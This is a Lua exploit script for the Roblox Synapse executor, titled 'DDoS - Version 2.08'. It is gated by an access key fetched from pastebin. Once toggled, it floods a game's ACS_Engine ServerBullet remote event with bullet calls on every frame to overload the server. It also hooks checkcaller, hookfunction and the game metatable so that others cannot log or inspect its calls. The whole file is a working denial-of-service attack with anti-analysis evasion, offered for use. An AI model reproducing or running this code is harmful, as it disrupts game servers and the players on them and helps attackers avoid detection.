local Synapse = pcall(function() getrawmetatable(game) end)local Http = pcall(function() game:HttpGet('https://pastebin.com/raw/e8p1krhU') end)if not Synapse then print("mm studio cringy")return;end;if not Http then print("man i kinda need http you know")return;end;local a = game:HttpGet("https://pastebin.com/raw/aCGKcY6N")local b = string.split(a,",")local c = false;local d = ""if isfile("AccessKey.txt") then for index,e in pairs(b) do if string.split(e,':')[1]==tostring(readfile("AccessKey.txt")) then c = true;d=string.split(e,':')[2]end;end;end;if not c then return end;local rem = game:GetService("ReplicatedStorage").ACS_Engine:FindFirstChild("Eventos") or game:GetService("ReplicatedStorage").ACS_Engine:FindFirstChild("Events")if not rem then return end;rem = rem.ServerBullet;local E_DDoS = false;game:GetService("RunService").Stepped:Connect(function()if E_DDoS == true then for i = 1,2 do local CF = CFrame.new(Vector3.new(math.random(-10,10),1000,math.random(-10,10)), Vector3.new(0,10000,0))local args = {[1]=CF;[2]=false;[3]=10000;[4]=10;[5]=CF.LookVector;[6]=nil;[7]=workspace;[8]=false;[9]=nil}pcall(function() rem.FireServer(rem,unpack(args)) end)end;end;end)game:GetService("RunService").RenderStepped:Connect(function()if E_DDoS == true then for i = 1,2 do local CF = CFrame.new(Vector3.new(math.random(-10,10),1000,math.random(-10,10)), Vector3.new(0,10000,0))local args = {[1]=CF;[2]=false;[3]=10000;[4]=10;[5]=CF.LookVector;[6]=nil;[7]=workspace;[8]=false;[9]=nil}pcall(function() rem.FireServer(rem,unpack(args)) end)end;end;end)local CC;CC = hookfunction(getgenv().checkcaller,newcclosure(function(Ignore, ...) if Ignore == "That is epic." then return CC(Ignore, ...) else return error("Sussy cringe.") end end))hookfunction(getgenv().hookfunction,newcclosure(function() spawn(function() messagebox("Attempted to hookfunction.","Kinda cringe if you ask me          ",0) end) end))local GameMt = getrawmetatable(game)local OldIndex = GameMt.__index;local OldNameCall = GameMt.__namecall;setreadonly(GameMt, false)GameMt.__index = newcclosure(function(Self, Key)if not checkcaller("That is epic.") then return OldIndex(Self, Key) end;if tostring(Self)=="ServerBullet" then return OldIndex(Self, Key) end;if tostring(Key)~='FireServer'then return OldIndex(Self, Key) end;spawn(function() messagebox("Attempted to log.","Kinda cringe if you ask me          ",0) end)return warn;end)setreadonly(GameMt, true)function DDoS()E_DDoS = not E_DDoS;return tostring(E_DDoS)end;function Intro()
	rconsoleprint("@@LIGHT_GREEN@@")

	rconsoleprint([[
	
__/\\\\\\\\\\\\_____/\\\\\\\\\\\\______________________/\\\\\\\\\\\___        
 _\/\\\////////\\\__\/\\\////////\\\__________________/\\\/////////\\\_       
  _\/\\\______\//\\\_\/\\\______\//\\\________________\//\\\______\///__      
   _\/\\\_______\/\\\_\/\\\_______\/\\\_____/\\\\\______\////\\\_________     
    _\/\\\_______\/\\\_\/\\\_______\/\\\___/\\\///\\\_______\////\\\______    
     _\/\\\_______\/\\\_\/\\\_______\/\\\__/\\\__\//\\\_________\////\\\___   
      _\/\\\_______/\\\__\/\\\_______/\\\__\//\\\__/\\\___/\\\______\//\\\__  
       _\/\\\\\\\\\\\\/___\/\\\\\\\\\\\\/____\///\\\\\/___\///\\\\\\\\\\\/___ 
        _\////////////_____\////////////________\/////_______\///////////_____
	
	Made by Ray857#8102
	
	Welcome. 
	]]..tostring(d))end;function Clear()rconsoleclear()Intro()end;function Await()rconsoleprint("\n")rconsoleprint("@@LIGHT_GRAY@@")local input = rconsoleinput()local response local MSG = string.split(input," ")local suc,msg = pcall(function()response=getfenv()[MSG[1]](MSG[2])end)if not suc then rconsoleprint("@@LIGHT_RED@@") rconsoleprint("Something went wrong.") end;if response then rconsoleinfo(tostring(response)) end;Await()end;rconsolename('DDoS - Version 2.08')Intro()Await()
